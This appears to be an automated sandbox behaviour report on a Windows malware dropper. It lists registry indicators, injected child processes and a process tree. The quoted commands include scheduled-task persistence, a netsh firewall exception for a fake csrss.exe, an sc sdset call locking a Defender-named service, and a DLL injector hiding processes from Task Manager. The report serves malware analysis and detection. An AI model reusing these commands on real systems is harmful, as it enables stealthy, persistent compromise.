\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" VITLpmgdrZSEsfnjjCSHaEDR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe -
Modifies registry class 2 IoCs
Processes:
setup.exef0_8GJMbJWHKd0bn8qAoSGuv.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ f0_8GJMbJWHKd0bn8qAoSGuv.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
setup.exeK0NNvWiVJgVgRj4wsXiZz39s.exeS7BJFj0JPGuOIK5ke2EiWzRe.exeevl5AhAqx92wdfRi532WmaQN.tmpw6rxdZKVGKZ4S99sMhSfXG4z.exef0_8GJMbJWHKd0bn8qAoSGuv.exezVlqImu7G3G4sPmxLZrutQJQ.exepowershell.exepid process 4996 setup.exe 4996 setup.exe 5640 K0NNvWiVJgVgRj4wsXiZz39s.exe 5640 K0NNvWiVJgVgRj4wsXiZz39s.exe 5276 S7BJFj0JPGuOIK5ke2EiWzRe.exe 5276 S7BJFj0JPGuOIK5ke2EiWzRe.exe 6044 evl5AhAqx92wdfRi532WmaQN.tmp 6044 evl5AhAqx92wdfRi532WmaQN.tmp 3256 3256 3256 3256 3256 3256 3256 3256 1312 w6rxdZKVGKZ4S99sMhSfXG4z.exe 1312 w6rxdZKVGKZ4S99sMhSfXG4z.exe 3256 3256 3256 3256 3256 3256 3256 3256 3256 3256 3256 3256 1312 w6rxdZKVGKZ4S99sMhSfXG4z.exe 1312 w6rxdZKVGKZ4S99sMhSfXG4z.exe 748 f0_8GJMbJWHKd0bn8qAoSGuv.exe 748 f0_8GJMbJWHKd0bn8qAoSGuv.exe 3256 3256 3256 3256 3256 3256 3256 3256 3256 3256 3256 3256 3256 3256 956 zVlqImu7G3G4sPmxLZrutQJQ.exe 956 zVlqImu7G3G4sPmxLZrutQJQ.exe 3256 3256 3256 3256 3256 3256 3256 3256 5504 powershell.exe 5504 powershell.exe 3256 3256 3256 3256 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
K0NNvWiVJgVgRj4wsXiZz39s.exepid process 5640 K0NNvWiVJgVgRj4wsXiZz39s.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
Processes:
chrome.exepid process 5940 chrome.exe 5940 chrome.exe -
Suspicious use of AdjustPrivilegeToken 62 IoCs
Processes:
powershell.exepowershell.exepowershell.exeMsBuild.exeQaQDZ75Ud6n9EKcYI2SHfJNs.exeVITLpmgdrZSEsfnjjCSHaEDR.exepowershell.exereg.exedescription pid process Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeDebugPrivilege 5504 powershell.exe Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeDebugPrivilege 5348 powershell.exe Token: SeDebugPrivilege 5484 powershell.exe Token: SeDebugPrivilege 2780 MsBuild.exe Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeDebugPrivilege 5616 QaQDZ75Ud6n9EKcYI2SHfJNs.exe Token: SeImpersonatePrivilege 5616 QaQDZ75Ud6n9EKcYI2SHfJNs.exe Token: SeDebugPrivilege 5624 VITLpmgdrZSEsfnjjCSHaEDR.exe Token: SeImpersonatePrivilege 5624 VITLpmgdrZSEsfnjjCSHaEDR.exe Token: SeDebugPrivilege 2816 powershell.exe Token: SeDebugPrivilege 2064 reg.exe Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 Token: SeShutdownPrivilege 3256 Token: SeCreatePagefilePrivilege 3256 -
Suspicious use of FindShellTrayWindow 22 IoCs
Processes:
evl5AhAqx92wdfRi532WmaQN.tmpchrome.exepid process 6044 evl5AhAqx92wdfRi532WmaQN.tmp 3256 3256 3256 3256 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe -
Suspicious use of SendNotifyMessage 16 IoCs
Processes:
chrome.exepid process 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe 5940 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup.exeevl5AhAqx92wdfRi532WmaQN.exef0_8GJMbJWHKd0bn8qAoSGuv.exedescription pid process target process PID 4996 wrote to memory of 956 4996 setup.exe zVlqImu7G3G4sPmxLZrutQJQ.exe PID 4996 wrote to memory of 956 4996 setup.exe zVlqImu7G3G4sPmxLZrutQJQ.exe PID 4996 wrote to memory of 956 4996 setup.exe zVlqImu7G3G4sPmxLZrutQJQ.exe PID 4996 wrote to memory of 5260 4996 setup.exe e1lkxrydipIJfmBIkHJEKZuB.exe PID 4996 wrote to memory of 5260 4996 setup.exe e1lkxrydipIJfmBIkHJEKZuB.exe PID 4996 wrote to memory of 5260 4996 setup.exe e1lkxrydipIJfmBIkHJEKZuB.exe PID 4996 wrote to memory of 5276 4996 setup.exe S7BJFj0JPGuOIK5ke2EiWzRe.exe PID 4996 wrote to memory of 5276 4996 setup.exe S7BJFj0JPGuOIK5ke2EiWzRe.exe PID 4996 wrote to memory of 5276 4996 setup.exe S7BJFj0JPGuOIK5ke2EiWzRe.exe PID 4996 wrote to memory of 5288 4996 setup.exe evl5AhAqx92wdfRi532WmaQN.exe PID 4996 wrote to memory of 5288 4996 setup.exe evl5AhAqx92wdfRi532WmaQN.exe PID 4996 wrote to memory of 5288 4996 setup.exe evl5AhAqx92wdfRi532WmaQN.exe PID 4996 wrote to memory of 5616 4996 setup.exe QaQDZ75Ud6n9EKcYI2SHfJNs.exe PID 4996 wrote to memory of 5616 4996 setup.exe QaQDZ75Ud6n9EKcYI2SHfJNs.exe PID 4996 wrote to memory of 5616 4996 setup.exe QaQDZ75Ud6n9EKcYI2SHfJNs.exe PID 4996 wrote to memory of 5624 4996 setup.exe VITLpmgdrZSEsfnjjCSHaEDR.exe PID 4996 wrote to memory of 5624 4996 setup.exe VITLpmgdrZSEsfnjjCSHaEDR.exe PID 4996 wrote to memory of 5624 4996 setup.exe VITLpmgdrZSEsfnjjCSHaEDR.exe PID 4996 wrote to memory of 5640 4996 setup.exe K0NNvWiVJgVgRj4wsXiZz39s.exe PID 4996 wrote to memory of 5640 4996 setup.exe K0NNvWiVJgVgRj4wsXiZz39s.exe PID 4996 wrote to memory of 5640 4996 setup.exe K0NNvWiVJgVgRj4wsXiZz39s.exe PID 4996 wrote to memory of 5648 4996 setup.exe vGrIU7ib1YOS2PYSmzDAoF5v.exe PID 4996 wrote to memory of 5648 4996 setup.exe vGrIU7ib1YOS2PYSmzDAoF5v.exe PID 4996 wrote to memory of 5648 4996 setup.exe vGrIU7ib1YOS2PYSmzDAoF5v.exe PID 4996 wrote to memory of 5992 4996 setup.exe LghhhG5dYtl5hoIKD95UlVUg.exe PID 4996 wrote to memory of 5992 4996 setup.exe LghhhG5dYtl5hoIKD95UlVUg.exe PID 4996 wrote to memory of 5992 4996 setup.exe LghhhG5dYtl5hoIKD95UlVUg.exe PID 4996 wrote to memory of 5984 4996 setup.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 4996 wrote to memory of 5984 4996 setup.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 4996 wrote to memory of 5984 4996 setup.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 4996 wrote to memory of 6000 4996 setup.exe LCpil3pW_l7ri4gXpRd7f0AQ.exe PID 4996 wrote to memory of 6000 4996 setup.exe LCpil3pW_l7ri4gXpRd7f0AQ.exe PID 4996 wrote to memory of 6000 4996 setup.exe LCpil3pW_l7ri4gXpRd7f0AQ.exe PID 4996 wrote to memory of 6052 4996 setup.exe AKDaZLMxwKvUY2U0BxfH0RwL.exe PID 4996 wrote to memory of 6052 4996 setup.exe AKDaZLMxwKvUY2U0BxfH0RwL.exe PID 4996 wrote to memory of 6052 4996 setup.exe AKDaZLMxwKvUY2U0BxfH0RwL.exe PID 5288 wrote to memory of 6044 5288 evl5AhAqx92wdfRi532WmaQN.exe evl5AhAqx92wdfRi532WmaQN.tmp PID 5288 wrote to memory of 6044 5288 evl5AhAqx92wdfRi532WmaQN.exe evl5AhAqx92wdfRi532WmaQN.tmp PID 5288 wrote to memory of 6044 5288 evl5AhAqx92wdfRi532WmaQN.exe evl5AhAqx92wdfRi532WmaQN.tmp PID 4996 wrote to memory of 1312 4996 setup.exe w6rxdZKVGKZ4S99sMhSfXG4z.exe PID 4996 wrote to memory of 1312 4996 setup.exe w6rxdZKVGKZ4S99sMhSfXG4z.exe PID 4996 wrote to memory of 1312 4996 setup.exe w6rxdZKVGKZ4S99sMhSfXG4z.exe PID 4996 wrote to memory of 1732 4996 setup.exe NnROE5b4OASR13ERwrphVqIv.exe PID 4996 wrote to memory of 1732 4996 setup.exe NnROE5b4OASR13ERwrphVqIv.exe PID 4996 wrote to memory of 1732 4996 setup.exe NnROE5b4OASR13ERwrphVqIv.exe PID 4996 wrote to memory of 2932 4996 setup.exe SBv9uOfXRyyWp_0lKyUFY2zJ.exe PID 4996 wrote to memory of 2932 4996 setup.exe SBv9uOfXRyyWp_0lKyUFY2zJ.exe PID 4996 wrote to memory of 2932 4996 setup.exe SBv9uOfXRyyWp_0lKyUFY2zJ.exe PID 4996 wrote to memory of 1740 4996 setup.exe jfuVd2Wxxnz6tzydAf9H8i_Y.exe PID 4996 wrote to memory of 1740 4996 setup.exe jfuVd2Wxxnz6tzydAf9H8i_Y.exe PID 4996 wrote to memory of 1740 4996 setup.exe jfuVd2Wxxnz6tzydAf9H8i_Y.exe PID 5984 wrote to memory of 748 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 5984 wrote to memory of 748 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 5984 wrote to memory of 748 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 4996 wrote to memory of 2424 4996 setup.exe schtasks.exe PID 4996 wrote to memory of 2424 4996 setup.exe schtasks.exe PID 4996 wrote to memory of 2424 4996 setup.exe schtasks.exe PID 5984 wrote to memory of 748 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 5984 wrote to memory of 748 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 5984 wrote to memory of 748 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 5984 wrote to memory of 748 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 5984 wrote to memory of 748 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 5984 wrote to memory of 748 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe PID 5984 wrote to memory of 748 5984 f0_8GJMbJWHKd0bn8qAoSGuv.exe f0_8GJMbJWHKd0bn8qAoSGuv.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\Users\Admin\Documents\GuardFox\zVlqImu7G3G4sPmxLZrutQJQ.exe"C:\Users\Admin\Documents\GuardFox\zVlqImu7G3G4sPmxLZrutQJQ.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:956 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 21643⤵
- Program crash
PID:5608 -
C:\Users\Admin\Documents\GuardFox\LCpil3pW_l7ri4gXpRd7f0AQ.exe"C:\Users\Admin\Documents\GuardFox\LCpil3pW_l7ri4gXpRd7f0AQ.exe"2⤵
- Executes dropped EXE
PID:6000 -
C:\Users\Admin\Documents\GuardFox\AKDaZLMxwKvUY2U0BxfH0RwL.exe"C:\Users\Admin\Documents\GuardFox\AKDaZLMxwKvUY2U0BxfH0RwL.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:6052 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe3⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
PID:2780 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"4⤵
- Executes dropped EXE
PID:5968 -
C:\Users\Admin\Documents\GuardFox\w6rxdZKVGKZ4S99sMhSfXG4z.exe"C:\Users\Admin\Documents\GuardFox\w6rxdZKVGKZ4S99sMhSfXG4z.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:1312 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:3780 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2456 -
C:\Users\Admin\Documents\GuardFox\FTX9TSuWx9FxH3XuanhJX4zO.exe"C:\Users\Admin\Documents\GuardFox\FTX9TSuWx9FxH3XuanhJX4zO.exe"2⤵PID:2424
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"3⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5940 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1952 --field-trial-handle=1948,i,10310755533706325085,10442260249649040439,131072 /prefetch:84⤵
- Drops file in Program Files directory
PID:644 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1936 --field-trial-handle=1948,i,10310755533706325085,10442260249649040439,131072 /prefetch:84⤵PID:5096
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1712 --field-trial-handle=1948,i,10310755533706325085,10442260249649040439,131072 /prefetch:24⤵PID:4656
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=1948,i,10310755533706325085,10442260249649040439,131072 /prefetch:14⤵PID:2640
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3144 --field-trial-handle=1948,i,10310755533706325085,10442260249649040439,131072 /prefetch:14⤵PID:4016
-
C:\Users\Admin\Documents\GuardFox\jfuVd2Wxxnz6tzydAf9H8i_Y.exe"C:\Users\Admin\Documents\GuardFox\jfuVd2Wxxnz6tzydAf9H8i_Y.exe"2⤵
- Executes dropped EXE
PID:1740 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 22283⤵
- Program crash
PID:224 -
C:\Users\Admin\Documents\GuardFox\SBv9uOfXRyyWp_0lKyUFY2zJ.exe"C:\Users\Admin\Documents\GuardFox\SBv9uOfXRyyWp_0lKyUFY2zJ.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2932 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5168
-
C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe"C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1732 -
C:\Users\Admin\Documents\GuardFox\LghhhG5dYtl5hoIKD95UlVUg.exe"C:\Users\Admin\Documents\GuardFox\LghhhG5dYtl5hoIKD95UlVUg.exe"2⤵
- Executes dropped EXE
PID:5992 -
C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe"C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5984 -
C:\Users\Admin\Documents\GuardFox\vGrIU7ib1YOS2PYSmzDAoF5v.exe"C:\Users\Admin\Documents\GuardFox\vGrIU7ib1YOS2PYSmzDAoF5v.exe"2⤵
- Executes dropped EXE
PID:5648 -
C:\Users\Admin\Documents\GuardFox\K0NNvWiVJgVgRj4wsXiZz39s.exe"C:\Users\Admin\Documents\GuardFox\K0NNvWiVJgVgRj4wsXiZz39s.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5640 -
C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe"C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5624 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5348 -
C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe"C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3036 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2816 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵PID:3284
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- Modifies Windows Firewall
PID:5832 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:2892
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:4680
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe4⤵PID:2544
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:4408
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:2808 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f5⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
PID:2424 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:1800
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:3764
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll5⤵PID:5612
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:1460 -
C:\Windows\windefender.exe"C:\Windows\windefender.exe"5⤵PID:5348
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵PID:3784
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
- Launches sc.exe
PID:5688 -
C:\Users\Admin\Documents\GuardFox\QaQDZ75Ud6n9EKcYI2SHfJNs.exe"C:\Users\Admin\Documents\GuardFox\QaQDZ75Ud6n9EKcYI2SHfJNs.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5616 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5484 -
C:\Users\Admin\Documents\GuardFox\QaQDZ75Ud6n9EKcYI2SHfJNs.exe"C:\Users\Admin\Documents\GuardFox\QaQDZ75Ud6n9EKcYI2SHfJNs.exe"3⤵
- Executes dropped EXE
PID:6076 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:2064
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3652
-
